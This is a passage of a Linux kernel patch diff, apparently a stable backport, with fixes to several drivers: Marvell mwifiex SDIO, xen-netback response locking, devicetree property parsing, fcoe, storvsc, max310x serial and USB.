+ 		card->can_auto_tdls = data->can_auto_tdls;
+ 		card->can_ext_scan = data->can_ext_scan;
++		card->fw_ready_extra_delay = data->fw_ready_extra_delay;
+ 		INIT_WORK(&card->work, mwifiex_sdio_work);
+ 	}
+ 
+@@ -748,8 +777,9 @@ mwifiex_sdio_read_fw_status(struct mwifiex_adapter *adapter, u16 *dat)
+ static int mwifiex_check_fw_status(struct mwifiex_adapter *adapter,
+ 				   u32 poll_num)
+ {
++	struct sdio_mmc_card *card = adapter->card;
+ 	int ret = 0;
+-	u16 firmware_stat;
++	u16 firmware_stat = 0;
+ 	u32 tries;
+ 
+ 	for (tries = 0; tries < poll_num; tries++) {
+@@ -765,6 +795,13 @@ static int mwifiex_check_fw_status(struct mwifiex_adapter *adapter,
+ 		ret = -1;
+ 	}
+ 
++	if (card->fw_ready_extra_delay &&
++	    firmware_stat == FIRMWARE_READY_SDIO)
++		/* firmware might pretend to be ready, when it's not.
++		 * Wait a little bit more as a workaround.
++		 */
++		msleep(100);
++
+ 	return ret;
+ }
+ 
+@@ -920,6 +957,8 @@ static const struct sdio_device_id mwifiex_ids[] = {
+ 		.driver_data = (unsigned long)&mwifiex_sdio_sd8801},
+ 	{SDIO_DEVICE(SDIO_VENDOR_ID_MARVELL, SDIO_DEVICE_ID_MARVELL_8977_WLAN),
+ 		.driver_data = (unsigned long)&mwifiex_sdio_sd8977},
++	{SDIO_DEVICE(SDIO_VENDOR_ID_MARVELL, SDIO_DEVICE_ID_MARVELL_8978_WLAN),
++		.driver_data = (unsigned long)&mwifiex_sdio_sd8978},
+ 	{SDIO_DEVICE(SDIO_VENDOR_ID_MARVELL, SDIO_DEVICE_ID_MARVELL_8987_WLAN),
+ 		.driver_data = (unsigned long)&mwifiex_sdio_sd8987},
+ 	{SDIO_DEVICE(SDIO_VENDOR_ID_MARVELL, SDIO_DEVICE_ID_MARVELL_8997_WLAN),
+@@ -3164,6 +3203,7 @@ MODULE_FIRMWARE(SD8797_DEFAULT_FW_NAME);
+ MODULE_FIRMWARE(SD8897_DEFAULT_FW_NAME);
+ MODULE_FIRMWARE(SD8887_DEFAULT_FW_NAME);
+ MODULE_FIRMWARE(SD8977_DEFAULT_FW_NAME);
++MODULE_FIRMWARE(SD8978_SDIOUART_FW_NAME);
+ MODULE_FIRMWARE(SD8987_DEFAULT_FW_NAME);
+ MODULE_FIRMWARE(SD8997_DEFAULT_FW_NAME);
+ MODULE_FIRMWARE(SD8997_SDIOUART_FW_NAME);
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.h b/drivers/net/wireless/marvell/mwifiex/sdio.h
+index 3a24bb48b2996..a5112cb35cdcd 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.h
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.h
+@@ -25,6 +25,7 @@
+ #define SD8887_DEFAULT_FW_NAME "mrvl/sd8887_uapsta.bin"
+ #define SD8801_DEFAULT_FW_NAME "mrvl/sd8801_uapsta.bin"
+ #define SD8977_DEFAULT_FW_NAME "mrvl/sdsd8977_combo_v2.bin"
++#define SD8978_SDIOUART_FW_NAME "mrvl/sdiouartiw416_combo_v0.bin"
+ #define SD8987_DEFAULT_FW_NAME "mrvl/sd8987_uapsta.bin"
+ #define SD8997_DEFAULT_FW_NAME "mrvl/sdsd8997_combo_v4.bin"
+ #define SD8997_SDIOUART_FW_NAME "mrvl/sdiouart8997_combo_v4.bin"
+@@ -257,6 +258,7 @@ struct sdio_mmc_card {
+ 	bool fw_dump_enh;
+ 	bool can_auto_tdls;
+ 	bool can_ext_scan;
++	bool fw_ready_extra_delay;
+ 
+ 	struct mwifiex_sdio_mpa_tx mpa_tx;
+ 	struct mwifiex_sdio_mpa_rx mpa_rx;
+@@ -280,6 +282,7 @@ struct mwifiex_sdio_device {
+ 	bool fw_dump_enh;
+ 	bool can_auto_tdls;
+ 	bool can_ext_scan;
++	bool fw_ready_extra_delay;
+ };
+ 
+ /*
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index 2716040985748..0d51c900c5538 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -104,13 +104,12 @@ bool provides_xdp_headroom = true;
+ module_param(provides_xdp_headroom, bool, 0644);
+ 
+ static void xenvif_idx_release(struct xenvif_queue *queue, u16 pending_idx,
+-			       u8 status);
++			       s8 status);
+ 
+ static void make_tx_response(struct xenvif_queue *queue,
+-			     struct xen_netif_tx_request *txp,
++			     const struct xen_netif_tx_request *txp,
+ 			     unsigned int extra_count,
+-			     s8       st);
+-static void push_tx_responses(struct xenvif_queue *queue);
++			     s8 status);
+ 
+ static void xenvif_idx_unmap(struct xenvif_queue *queue, u16 pending_idx);
+ 
+@@ -208,13 +207,9 @@ static void xenvif_tx_err(struct xenvif_queue *queue,
+ 			  unsigned int extra_count, RING_IDX end)
+ {
+ 	RING_IDX cons = queue->tx.req_cons;
+-	unsigned long flags;
+ 
+ 	do {
+-		spin_lock_irqsave(&queue->response_lock, flags);
+ 		make_tx_response(queue, txp, extra_count, XEN_NETIF_RSP_ERROR);
+-		push_tx_responses(queue);
+-		spin_unlock_irqrestore(&queue->response_lock, flags);
+ 		if (cons == end)
+ 			break;
+ 		RING_COPY_REQUEST(&queue->tx, cons++, txp);
+@@ -465,12 +460,7 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 	for (shinfo->nr_frags = 0; nr_slots > 0 && shinfo->nr_frags < MAX_SKB_FRAGS;
+ 	     nr_slots--) {
+ 		if (unlikely(!txp->size)) {
+-			unsigned long flags;
+-
+-			spin_lock_irqsave(&queue->response_lock, flags);
+ 			make_tx_response(queue, txp, 0, XEN_NETIF_RSP_OKAY);
+-			push_tx_responses(queue);
+-			spin_unlock_irqrestore(&queue->response_lock, flags);
+ 			++txp;
+ 			continue;
+ 		}
+@@ -496,14 +486,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 
+ 		for (shinfo->nr_frags = 0; shinfo->nr_frags < nr_slots; ++txp) {
+ 			if (unlikely(!txp->size)) {
+-				unsigned long flags;
+-
+-				spin_lock_irqsave(&queue->response_lock, flags);
+ 				make_tx_response(queue, txp, 0,
+ 						 XEN_NETIF_RSP_OKAY);
+-				push_tx_responses(queue);
+-				spin_unlock_irqrestore(&queue->response_lock,
+-						       flags);
+ 				continue;
+ 			}
+ 
+@@ -997,7 +981,6 @@ static void xenvif_tx_build_gops(struct xenvif_queue *queue,
+ 					 (ret == 0) ?
+ 					 XEN_NETIF_RSP_OKAY :
+ 					 XEN_NETIF_RSP_ERROR);
+-			push_tx_responses(queue);
+ 			continue;
+ 		}
+ 
+@@ -1009,7 +992,6 @@ static void xenvif_tx_build_gops(struct xenvif_queue *queue,
+ 
+ 			make_tx_response(queue, &txreq, extra_count,
+ 					 XEN_NETIF_RSP_OKAY);
+-			push_tx_responses(queue);
+ 			continue;
+ 		}
+ 
+@@ -1444,8 +1426,35 @@ int xenvif_tx_action(struct xenvif_queue *queue, int budget)
+ 	return work_done;
+ }
+ 
++static void _make_tx_response(struct xenvif_queue *queue,
++			     const struct xen_netif_tx_request *txp,
++			     unsigned int extra_count,
++			     s8 status)
++{
++	RING_IDX i = queue->tx.rsp_prod_pvt;
++	struct xen_netif_tx_response *resp;
++
++	resp = RING_GET_RESPONSE(&queue->tx, i);
++	resp->id     = txp->id;
++	resp->status = status;
++
++	while (extra_count-- != 0)
++		RING_GET_RESPONSE(&queue->tx, ++i)->status = XEN_NETIF_RSP_NULL;
++
++	queue->tx.rsp_prod_pvt = ++i;
++}
++
++static void push_tx_responses(struct xenvif_queue *queue)
++{
++	int notify;
++
++	RING_PUSH_RESPONSES_AND_CHECK_NOTIFY(&queue->tx, notify);
++	if (notify)
++		notify_remote_via_irq(queue->tx_irq);
++}
++
+ static void xenvif_idx_release(struct xenvif_queue *queue, u16 pending_idx,
+-			       u8 status)
++			       s8 status)
+ {
+ 	struct pending_tx_info *pending_tx_info;
+ 	pending_ring_idx_t index;
+@@ -1455,8 +1464,8 @@ static void xenvif_idx_release(struct xenvif_queue *queue, u16 pending_idx,
+ 
+ 	spin_lock_irqsave(&queue->response_lock, flags);
+ 
+-	make_tx_response(queue, &pending_tx_info->req,
+-			 pending_tx_info->extra_count, status);
++	_make_tx_response(queue, &pending_tx_info->req,
++			  pending_tx_info->extra_count, status);
+ 
+ 	/* Release the pending index before pusing the Tx response so
+ 	 * its available before a new Tx request is pushed by the
+@@ -1470,32 +1479,19 @@ static void xenvif_idx_release(struct xenvif_queue *queue, u16 pending_idx,
+ 	spin_unlock_irqrestore(&queue->response_lock, flags);
+ }
+ 
+-
+ static void make_tx_response(struct xenvif_queue *queue,
+-			     struct xen_netif_tx_request *txp,
++			     const struct xen_netif_tx_request *txp,
+ 			     unsigned int extra_count,
+-			     s8       st)
++			     s8 status)
+ {
+-	RING_IDX i = queue->tx.rsp_prod_pvt;
+-	struct xen_netif_tx_response *resp;
+-
+-	resp = RING_GET_RESPONSE(&queue->tx, i);
+-	resp->id     = txp->id;
+-	resp->status = st;
+-
+-	while (extra_count-- != 0)
+-		RING_GET_RESPONSE(&queue->tx, ++i)->status = XEN_NETIF_RSP_NULL;
++	unsigned long flags;
+ 
+-	queue->tx.rsp_prod_pvt = ++i;
+-}
++	spin_lock_irqsave(&queue->response_lock, flags);
+ 
+-static void push_tx_responses(struct xenvif_queue *queue)
+-{
+-	int notify;
++	_make_tx_response(queue, txp, extra_count, status);
++	push_tx_responses(queue);
+ 
+-	RING_PUSH_RESPONSES_AND_CHECK_NOTIFY(&queue->tx, notify);
+-	if (notify)
+-		notify_remote_via_irq(queue->tx_irq);
++	spin_unlock_irqrestore(&queue->response_lock, flags);
+ }
+ 
+ static void xenvif_idx_unmap(struct xenvif_queue *queue, u16 pending_idx)
+diff --git a/drivers/of/property.c b/drivers/of/property.c
+index b636777e6f7c8..33d5f16c81204 100644
+--- a/drivers/of/property.c
++++ b/drivers/of/property.c
+@@ -762,7 +762,9 @@ struct device_node *of_graph_get_port_parent(struct device_node *node)
+ 	/* Walk 3 levels up only if there is 'ports' node. */
+ 	for (depth = 3; depth && node; depth--) {
+ 		node = of_get_next_parent(node);
+-		if (depth == 2 && !of_node_name_eq(node, "ports"))
++		if (depth == 2 && !of_node_name_eq(node, "ports") &&
++		    !of_node_name_eq(node, "in-ports") &&
++		    !of_node_name_eq(node, "out-ports"))
+ 			break;
+ 	}
+ 	return node;
+@@ -1243,7 +1245,7 @@ DEFINE_SIMPLE_PROP(clocks, "clocks", "#clock-cells")
+ DEFINE_SIMPLE_PROP(interconnects, "interconnects", "#interconnect-cells")
+ DEFINE_SIMPLE_PROP(iommus, "iommus", "#iommu-cells")
+ DEFINE_SIMPLE_PROP(mboxes, "mboxes", "#mbox-cells")
+-DEFINE_SIMPLE_PROP(io_channels, "io-channel", "#io-channel-cells")
++DEFINE_SIMPLE_PROP(io_channels, "io-channels", "#io-channel-cells")
+ DEFINE_SIMPLE_PROP(interrupt_parent, "interrupt-parent", NULL)
+ DEFINE_SIMPLE_PROP(dmas, "dmas", "#dma-cells")
+ DEFINE_SIMPLE_PROP(power_domains, "power-domains", "#power-domain-cells")
+@@ -1261,7 +1263,6 @@ DEFINE_SIMPLE_PROP(pinctrl5, "pinctrl-5", NULL)
+ DEFINE_SIMPLE_PROP(pinctrl6, "pinctrl-6", NULL)
+ DEFINE_SIMPLE_PROP(pinctrl7, "pinctrl-7", NULL)
+ DEFINE_SIMPLE_PROP(pinctrl8, "pinctrl-8", NULL)
+-DEFINE_SIMPLE_PROP(remote_endpoint, "remote-endpoint", NULL)
+ DEFINE_SIMPLE_PROP(pwms, "pwms", "#pwm-cells")
+ DEFINE_SIMPLE_PROP(resets, "resets", "#reset-cells")
+ DEFINE_SIMPLE_PROP(leds, "leds", NULL)
+@@ -1326,6 +1327,17 @@ static struct device_node *parse_interrupts(struct device_node *np,
+ 	return of_irq_parse_one(np, index, &sup_args) ? NULL : sup_args.np;
+ }
+ 
++static struct device_node *parse_remote_endpoint(struct device_node *np,
++						 const char *prop_name,
++						 int index)
++{
++	/* Return NULL for index > 0 to signify end of remote-endpoints. */
++	if (!index || strcmp(prop_name, "remote-endpoint"))
++		return NULL;
++
++	return of_graph_get_remote_port_parent(np);
++}
++
+ static const struct supplier_bindings of_supplier_bindings[] = {
+ 	{ .parse_prop = parse_clocks, },
+ 	{ .parse_prop = parse_interconnects, },
+diff --git a/drivers/of/unittest.c b/drivers/of/unittest.c
+index e541a8960f1de..ce1386074e66b 100644
+--- a/drivers/of/unittest.c
++++ b/drivers/of/unittest.c
+@@ -49,6 +49,12 @@ static struct unittest_results {
+ 	failed; \
+ })
+ 
++#ifdef CONFIG_OF_KOBJ
++#define OF_KREF_READ(NODE) kref_read(&(NODE)->kobj.kref)
++#else
++#define OF_KREF_READ(NODE) 1
++#endif
++
+ /*
+  * Expected message may have a message level other than KERN_INFO.
+  * Print the expected message only if the current loglevel will allow
+@@ -562,7 +568,7 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 			pr_err("missing testcase data\n");
+ 			return;
+ 		}
+-		prefs[i] = kref_read(&p[i]->kobj.kref);
++		prefs[i] = OF_KREF_READ(p[i]);
+ 	}
+ 
+ 	rc = of_count_phandle_with_args(np, "phandle-list", "#phandle-cells");
+@@ -685,9 +691,9 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 	unittest(rc == -EINVAL, "expected:%i got:%i\n", -EINVAL, rc);
+ 
+ 	for (i = 0; i < ARRAY_SIZE(p); ++i) {
+-		unittest(prefs[i] == kref_read(&p[i]->kobj.kref),
++		unittest(prefs[i] == OF_KREF_READ(p[i]),
+ 			 "provider%d: expected:%d got:%d\n",
+-			 i, prefs[i], kref_read(&p[i]->kobj.kref));
++			 i, prefs[i], OF_KREF_READ(p[i]));
+ 		of_node_put(p[i]);
+ 	}
+ }
+diff --git a/drivers/s390/net/qeth_l3_main.c b/drivers/s390/net/qeth_l3_main.c
+index c0f30cefec102..a416011391856 100644
+--- a/drivers/s390/net/qeth_l3_main.c
++++ b/drivers/s390/net/qeth_l3_main.c
+@@ -254,9 +254,10 @@ static void qeth_l3_clear_ip_htable(struct qeth_card *card, int recover)
+ 		if (!recover) {
+ 			hash_del(&addr->hnode);
+ 			kfree(addr);
+-			continue;
++		} else {
++			/* prepare for recovery */
++			addr->disp_flag = QETH_DISP_ADDR_ADD;
+ 		}
+-		addr->disp_flag = QETH_DISP_ADDR_ADD;
+ 	}
+ 
+ 	mutex_unlock(&card->ip_lock);
+@@ -277,9 +278,11 @@ static void qeth_l3_recover_ip(struct qeth_card *card)
+ 		if (addr->disp_flag == QETH_DISP_ADDR_ADD) {
+ 			rc = qeth_l3_register_addr_entry(card, addr);
+ 
+-			if (!rc) {
++			if (!rc || rc == -EADDRINUSE || rc == -ENETDOWN) {
++				/* keep it in the records */
+ 				addr->disp_flag = QETH_DISP_ADDR_DO_NOTHING;
+ 			} else {
++				/* bad address */
+ 				hash_del(&addr->hnode);
+ 				kfree(addr);
+ 			}
+diff --git a/drivers/scsi/fcoe/fcoe_ctlr.c b/drivers/scsi/fcoe/fcoe_ctlr.c
+index 8a4124e7d2043..ddc048069af25 100644
+--- a/drivers/scsi/fcoe/fcoe_ctlr.c
++++ b/drivers/scsi/fcoe/fcoe_ctlr.c
+@@ -319,17 +319,16 @@ static void fcoe_ctlr_announce(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *sel;
+ 	struct fcoe_fcf *fcf;
+-	unsigned long flags;
+ 
+ 	mutex_lock(&fip->ctlr_mutex);
+-	spin_lock_irqsave(&fip->ctlr_lock, flags);
++	spin_lock_bh(&fip->ctlr_lock);
+ 
+ 	kfree_skb(fip->flogi_req);
+ 	fip->flogi_req = NULL;
+ 	list_for_each_entry(fcf, &fip->fcfs, list)
+ 		fcf->flogi_sent = 0;
+ 
+-	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
++	spin_unlock_bh(&fip->ctlr_lock);
+ 	sel = fip->sel_fcf;
+ 
+ 	if (sel && ether_addr_equal(sel->fcf_mac, fip->dest_addr))
+@@ -700,7 +699,6 @@ int fcoe_ctlr_els_send(struct fcoe_ctlr *fip, struct fc_lport *lport,
+ {
+ 	struct fc_frame *fp;
+ 	struct fc_frame_header *fh;
+-	unsigned long flags;
+ 	u16 old_xid;
+ 	u8 op;
+ 	u8 mac[ETH_ALEN];
+@@ -734,11 +732,11 @@ int fcoe_ctlr_els_send(struct fcoe_ctlr *fip, struct fc_lport *lport,
+ 		op = FIP_DT_FLOGI;
+ 		if (fip->mode == FIP_MODE_VN2VN)
+ 			break;
+-		spin_lock_irqsave(&fip->ctlr_lock, flags);
++		spin_lock_bh(&fip->ctlr_lock);
+ 		kfree_skb(fip->flogi_req);
+ 		fip->flogi_req = skb;
+ 		fip->flogi_req_send = 1;
+-		spin_unlock_irqrestore(&fip->ctlr_lock, flags);
++		spin_unlock_bh(&fip->ctlr_lock);
+ 		schedule_work(&fip->timer_work);
+ 		return -EINPROGRESS;
+ 	case ELS_FDISC:
+@@ -1707,11 +1705,10 @@ static int fcoe_ctlr_flogi_send_locked(struct fcoe_ctlr *fip)
+ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *fcf;
+-	unsigned long flags;
+ 	int error;
+ 
+ 	mutex_lock(&fip->ctlr_mutex);
+-	spin_lock_irqsave(&fip->ctlr_lock, flags);
++	spin_lock_bh(&fip->ctlr_lock);
+ 	LIBFCOE_FIP_DBG(fip, "re-sending FLOGI - reselect\n");
+ 	fcf = fcoe_ctlr_select(fip);
+ 	if (!fcf || fcf->flogi_sent) {
+@@ -1722,7 +1719,7 @@ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ 		fcoe_ctlr_solicit(fip, NULL);
+ 		error = fcoe_ctlr_flogi_send_locked(fip);
+ 	}
+-	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
++	spin_unlock_bh(&fip->ctlr_lock);
+ 	mutex_unlock(&fip->ctlr_mutex);
+ 	return error;
+ }
+@@ -1739,9 +1736,8 @@ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ static void fcoe_ctlr_flogi_send(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *fcf;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&fip->ctlr_lock, flags);
++	spin_lock_bh(&fip->ctlr_lock);
+ 	fcf = fip->sel_fcf;
+ 	if (!fcf || !fip->flogi_req_send)
+ 		goto unlock;
+@@ -1768,7 +1764,7 @@ static void fcoe_ctlr_flogi_send(struct fcoe_ctlr *fip)
+ 	} else /* XXX */
+ 		LIBFCOE_FIP_DBG(fip, "No FCF selected - defer send\n");
+ unlock:
+-	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
++	spin_unlock_bh(&fip->ctlr_lock);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index c2d981d5a2dd5..4fad9d85bd6f9 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -326,6 +326,7 @@ enum storvsc_request_type {
+  */
+ 
+ static int storvsc_ringbuffer_size = (128 * 1024);
++static int aligned_ringbuffer_size;
+ static u32 max_outstanding_req_per_channel;
+ static int storvsc_change_queue_depth(struct scsi_device *sdev, int queue_depth);
+ 
+@@ -683,8 +684,8 @@ static void handle_sc_creation(struct vmbus_channel *new_sc)
+ 	new_sc->next_request_id_callback = storvsc_next_request_id;
+ 
+ 	ret = vmbus_open(new_sc,
+-			 storvsc_ringbuffer_size,
+-			 storvsc_ringbuffer_size,
++			 aligned_ringbuffer_size,
++			 aligned_ringbuffer_size,
+ 			 (void *)&props,
+ 			 sizeof(struct vmstorage_channel_properties),
+ 			 storvsc_on_channel_callback, new_sc);
+@@ -1964,7 +1965,7 @@ static int storvsc_probe(struct hv_device *device,
+ 	dma_set_min_align_mask(&device->device, HV_HYP_PAGE_SIZE - 1);
+ 
+ 	stor_device->port_number = host->host_no;
+-	ret = storvsc_connect_to_vsp(device, storvsc_ringbuffer_size, is_fc);
++	ret = storvsc_connect_to_vsp(device, aligned_ringbuffer_size, is_fc);
+ 	if (ret)
+ 		goto err_out1;
+ 
+@@ -2157,7 +2158,7 @@ static int storvsc_resume(struct hv_device *hv_dev)
+ {
+ 	int ret;
+ 
+-	ret = storvsc_connect_to_vsp(hv_dev, storvsc_ringbuffer_size,
++	ret = storvsc_connect_to_vsp(hv_dev, aligned_ringbuffer_size,
+ 				     hv_dev_is_fc(hv_dev));
+ 	return ret;
+ }
+@@ -2191,8 +2192,9 @@ static int __init storvsc_drv_init(void)
+ 	 * the ring buffer indices) by the max request size (which is
+ 	 * vmbus_channel_packet_multipage_buffer + struct vstor_packet + u64)
+ 	 */
++	aligned_ringbuffer_size = VMBUS_RING_SIZE(storvsc_ringbuffer_size);
+ 	max_outstanding_req_per_channel =
+-		((storvsc_ringbuffer_size - PAGE_SIZE) /
++		((aligned_ringbuffer_size - PAGE_SIZE) /
+ 		ALIGN(MAX_MULTIPAGE_BUFFER_PACKET +
+ 		sizeof(struct vstor_packet) + sizeof(u64),
+ 		sizeof(u64)));
+diff --git a/drivers/spi/spi-ppc4xx.c b/drivers/spi/spi-ppc4xx.c
+index d65f047b6c823..1179a1115137f 100644
+--- a/drivers/spi/spi-ppc4xx.c
++++ b/drivers/spi/spi-ppc4xx.c
+@@ -166,10 +166,8 @@ static int spi_ppc4xx_setupxfer(struct spi_device *spi, struct spi_transfer *t)
+ 	int scr;
+ 	u8 cdm = 0;
+ 	u32 speed;
+-	u8 bits_per_word;
+ 
+ 	/* Start with the generic configuration for this device. */
+-	bits_per_word = spi->bits_per_word;
+ 	speed = spi->max_speed_hz;
+ 
+ 	/*
+@@ -177,9 +175,6 @@ static int spi_ppc4xx_setupxfer(struct spi_device *spi, struct spi_transfer *t)
+ 	 * the transfer to overwrite the generic configuration with zeros.
+ 	 */
+ 	if (t) {
+-		if (t->bits_per_word)
+-			bits_per_word = t->bits_per_word;
+-
+ 		if (t->speed_hz)
+ 			speed = min(t->speed_hz, spi->max_speed_hz);
+ 	}
+diff --git a/drivers/staging/iio/impedance-analyzer/ad5933.c b/drivers/staging/iio/impedance-analyzer/ad5933.c
+index f177b20f0f2d9..ceba632138940 100644
+--- a/drivers/staging/iio/impedance-analyzer/ad5933.c
++++ b/drivers/staging/iio/impedance-analyzer/ad5933.c
+@@ -608,7 +608,7 @@ static void ad5933_work(struct work_struct *work)
+ 		struct ad5933_state, work.work);
+ 	struct iio_dev *indio_dev = i2c_get_clientdata(st->client);
+ 	__be16 buf[2];
+-	int val[2];
++	u16 val[2];
+ 	unsigned char status;
+ 	int ret;
+ 
+diff --git a/drivers/tty/serial/max310x.c b/drivers/tty/serial/max310x.c
+index 338cb19dec23c..163a89f84c9c2 100644
+--- a/drivers/tty/serial/max310x.c
++++ b/drivers/tty/serial/max310x.c
+@@ -237,6 +237,14 @@
+ #define MAX310x_REV_MASK		(0xf8)
+ #define MAX310X_WRITE_BIT		0x80
+ 
++/* Port startup definitions */
++#define MAX310X_PORT_STARTUP_WAIT_RETRIES	20 /* Number of retries */
++#define MAX310X_PORT_STARTUP_WAIT_DELAY_MS	10 /* Delay between retries */
++
++/* Crystal-related definitions */
++#define MAX310X_XTAL_WAIT_RETRIES	20 /* Number of retries */
++#define MAX310X_XTAL_WAIT_DELAY_MS	10 /* Delay between retries */
++
+ /* MAX3107 specific */
+ #define MAX3107_REV_ID			(0xa0)
+ 
+@@ -583,7 +591,7 @@ static int max310x_update_best_err(unsigned long f, long *besterr)
+ 	return 1;
+ }
+ 
+-static u32 max310x_set_ref_clk(struct device *dev, struct max310x_port *s,
++static s32 max310x_set_ref_clk(struct device *dev, struct max310x_port *s,
+ 			       unsigned long freq, bool xtal)
+ {
+ 	unsigned int div, clksrc, pllcfg = 0;
+@@ -641,12 +649,20 @@ static u32 max310x_set_ref_clk(struct device *dev, struct max310x_port *s,
+ 
+ 	/* Wait for crystal */
+ 	if (xtal) {
+-		unsigned int val;
+-		msleep(10);
+-		regmap_read(s->regmap, MAX310X_STS_IRQSTS_REG, &val);
+-		if (!(val & MAX310X_STS_CLKREADY_BIT)) {
+-			dev_warn(dev, "clock is not stable yet\n");
+-		}
++		bool stable = false;
++		unsigned int try = 0, val = 0;
++
++		do {
++			msleep(MAX310X_XTAL_WAIT_DELAY_MS);
++			regmap_read(s->regmap, MAX310X_STS_IRQSTS_REG, &val);
++
++			if (val & MAX310X_STS_CLKREADY_BIT)
++				stable = true;
++		} while (!stable && (++try < MAX310X_XTAL_WAIT_RETRIES));
++
++		if (!stable)
++			return dev_err_probe(dev, -EAGAIN,
++					     "clock is not stable\n");
+ 	}
+ 
+ 	return bestfreq;
+@@ -1274,7 +1290,7 @@ static int max310x_probe(struct device *dev, const struct max310x_devtype *devty
+ {
+ 	int i, ret, fmin, fmax, freq;
+ 	struct max310x_port *s;
+-	u32 uartclk = 0;
++	s32 uartclk = 0;
+ 	bool xtal;
+ 
+ 	for (i = 0; i < devtype->nr; i++)
+@@ -1337,6 +1353,9 @@ static int max310x_probe(struct device *dev, const struct max310x_devtype *devty
+ 		goto out_clk;
+ 
+ 	for (i = 0; i < devtype->nr; i++) {
++		bool started = false;
++		unsigned int try = 0, val = 0;
++
+ 		/* Reset port */
+ 		regmap_write(regmaps[i], MAX310X_MODE2_REG,
+ 			     MAX310X_MODE2_RST_BIT);
+@@ -1345,13 +1364,27 @@ static int max310x_probe(struct device *dev, const struct max310x_devtype *devty
+ 
+ 		/* Wait for port startup */
+ 		do {
+-			regmap_read(regmaps[i], MAX310X_BRGDIVLSB_REG, &ret);
+-		} while (ret != 0x01);
++			msleep(MAX310X_PORT_STARTUP_WAIT_DELAY_MS);
++			regmap_read(regmaps[i], MAX310X_BRGDIVLSB_REG, &val);
++
++			if (val == 0x01)
++				started = true;
++		} while (!started && (++try < MAX310X_PORT_STARTUP_WAIT_RETRIES));
++
++		if (!started) {
++			ret = dev_err_probe(dev, -EAGAIN, "port reset failed\n");
++			goto out_uart;
++		}
+ 
+ 		regmap_write(regmaps[i], MAX310X_MODE1_REG, devtype->mode1);
+ 	}
+ 
+ 	uartclk = max310x_set_ref_clk(dev, s, freq, xtal);
++	if (uartclk < 0) {
++		ret = uartclk;
++		goto out_uart;
++	}
++
+ 	dev_dbg(dev, "Reference clock set to %i Hz\n", uartclk);
+ 
+ 	for (i = 0; i < devtype->nr; i++) {
+diff --git a/drivers/usb/common/ulpi.c b/drivers/usb/common/ulpi.c
+index 38703781ee2d1..1283c427cdf88 100644
+--- a/drivers/usb/common/ulpi.c
++++ b/drivers/usb/common/ulpi.c
+@@ -301,7 +301,7 @@ static int ulpi_register(struct device *dev, struct ulpi *ulpi)
+ 		return ret;
+ 	}
+ 
+-	root = debugfs_create_dir(dev_name(dev), ulpi_root);
++	root = debugfs_create_dir(dev_name(&ulpi->dev), ulpi_root);
+ 	debugfs_create_file("regs", 0444, root, ulpi, &ulpi_regs_fops);
+ 
+ 	dev_dbg(&ulpi->dev, "registered ULPI PHY: vendor %04x, product %04x\n",
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 4f181110d00db..d960a56b760ec 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -2389,17 +2389,25 @@ static int usb_enumerate_device_otg(struct usb_device *udev)
+ 			}
+ 		} else if (desc->bLength == sizeof
+ 				(struct usb_otg_descriptor)) {
+-			/* Set a_alt_hnp_support for legacy otg device */
+-			err = usb_control_msg(udev,
+-				usb_sndctrlpipe(udev, 0),
+-				USB_REQ_SET_FEATURE, 0,
+-				USB_DEVICE_A_ALT_HNP_SUPPORT,
+-				0, NULL, 0,
+-				USB_CTRL_SET_TIMEOUT);
+-			if (err < 0)
+-				dev_err(&udev->dev,
+-					"set a_alt_hnp_support failed: %d\n",
+-					err);
++			/*
++			 * We are operating on a legacy OTP device
++			 * These should be told that they are operating
++			 * on the wrong port if we have another port that does
++			 * support HNP
++			 */
++			if (bus->otg_port != 0) {
++				/* Set a_alt_hnp_support for legacy otg device */
++				err = usb_control_msg(udev,
++					usb_sndctrlpipe(udev, 0),
++					USB_REQ_SET_FEATURE, 0,
++					USB_DEVICE_A_ALT_HNP_SUPPORT,
++					0, NULL, 0,
++					USB_CTRL_SET_TIMEOUT);
++				if (err < 0)
++					dev_err(&udev->dev,
++						"set a_alt_hnp_support failed: %d\n",
++						err);
++			}
+ 		}
+ 	}
+ #endif
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index c4703f6b20894..576c21bf77cda 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -4583,15 +4583,13 @@ int dwc3_gadget_suspend(struct dwc3 *dwc)
+ 	unsigned long flags;
+ 	int ret;
+ 
+-	if (!dwc->gadget_driver)
+-		return 0;
+-
+ 	ret = dwc3_gadget_soft_disconnect(dwc);
+ 	if (ret)
+ 		goto err;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+-	dwc3_disconnect_gadget(dwc);
++	if (dwc->gadget_driver)
++		dwc3_disconnect_gadget(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+ 	return 0;
+diff --git a/drivers/usb/gadget/function/f_mass_storage.c b/drivers/usb/gadget/function/f_mass_storage.c
+index 7b9a4cf9b100c..d35f30a9cae2c 100644
+--- a/drivers/usb/gadget/function/f_mass_storage.c
